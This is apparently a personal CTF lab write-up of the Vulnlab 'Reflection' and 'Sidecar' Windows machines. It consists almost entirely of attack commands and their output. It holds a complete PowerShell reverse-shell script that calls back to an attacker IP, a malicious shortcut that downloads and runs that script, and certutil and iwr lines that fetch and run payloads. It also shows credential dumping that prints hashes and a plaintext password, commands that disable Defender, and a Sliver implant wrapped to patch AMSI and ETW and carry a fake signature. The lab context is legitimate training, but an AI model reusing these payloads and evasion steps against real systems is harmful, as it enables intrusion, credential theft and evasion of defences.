┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and run secretsdump against ws01.reflection.vl with that ticket:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

 

 

vulnlab-sidecar

a very hard Windows machine

Preparing the reverse shell (puckshell.txt, a PowerShell script)

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

Create the malicious .lnk file on a Windows PC. As the link's target I used:

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

 

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

 

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

So we have the local accounts on WS01 listed above; next, the domain accounts:

c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.


c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let's run the implant through donut to turn it into position-independent shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then wrap the shellcode with ScareCrow

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

Got a session, but after uploading SharpHound.exe my Sliver session gets disconnected

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need beacon.exe in a new .lnk file:

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe


I created a working beacon and transferred it to the box with

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe

and ran c:\programdata\power.exe on the box.


┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #2

[!] Job #2 stopped (tcp/https)

[!] Job #2 stopped (tcp/https)

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

               

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST

sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d

[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)

[+] sitecar-3 completed task 952ffb7c


sliver (sitecar-3) >  


sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon sitecar-3 (15da41ae)

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (a86427ba)

[+] sitecar-3 completed task a86427ba

c:\ProgramData\temp (0 items, 0 B)
==================================


[+] sitecar-3 completed task 15da41ae

[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl

2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
 297 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.2445145387.log

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (0b9f5da2)

[+] sitecar-3 completed task 0b9f5da2

c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw-  20241023085045_BloodHound.zip                         31.2 KiB  Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw-  Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin  52.7 KiB  Wed Oct 23 08:50:48 +0200 2024


sliver (sitecar-3) > download 20241023085045_BloodHound.zip

[*] Tasked beacon sitecar-3 (44459e36)

[+] sitecar-3 completed task 44459e36

[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip

sliver (sitecar-3) >  

To be continued …

First we need to promote our beacon to a session to be able to run execute-shellcode.

Warning: if we use the interactive-shellcode session, we need to restart the Sliver server afterwards to execute assemblies.

Like this:

sliver > sessions 

[*] No sessions 🙁

[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST

sliver > use e5de6c1f-8a91-454b-9154-8006649aa751

[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)

sliver (sitecar-3) > interactive 

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)

[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST

sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
                                                                                                                     

And then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin:

sliver (sitecar-3) > ^C
interrupted
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2108

PS > dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       10/25/2024   8:53 AM       24830704 power.exe                                         



PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added

PS > 


sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
 59 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!

[*] Tasked beacon sitecar-3 (e2afe45b)

[+] sitecar-3 completed task e2afe45b

We can see that we can't create new machine accounts (ms-ds-machineaccountquota = 0):

sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (189947d6)

sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (c7f43d96)

sliver (sitecar-3) > tasks 

 ID         State       Message Type            Created                          Sent                             Completed                      
========== =========== ======================= ================================ ================================ ================================
 c7f43d96   sent        InvokeExecuteAssembly   Fri, 25 Oct 2024 15:39:01 CEST   Fri, 25 Oct 2024 15:39:07 CEST                                  
 74051079   sent        RegisterExtension       Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 189947d6   sent        CallExtension           Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 a730ea0b   completed   Download                Fri, 25 Oct 2024 15:18:49 CEST   Fri, 25 Oct 2024 15:18:56 CEST   Fri, 25 Oct 2024 15:18:56 CEST 
 db7bfb31   completed   Pwd                     Fri, 25 Oct 2024 15:18:19 CEST   Fri, 25 Oct 2024 15:18:22 CEST   Fri, 25 Oct 2024 15:18:22 CEST 


[+] sitecar-3 completed task c7f43d96

[*] Output:

[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] ridmanagerreference
    |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
    |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
    |_ 0
[+] systemflags
    |_ -1946157056
[+] minpwdage
    |_ -864000000000
[+] dscorepropagationdata
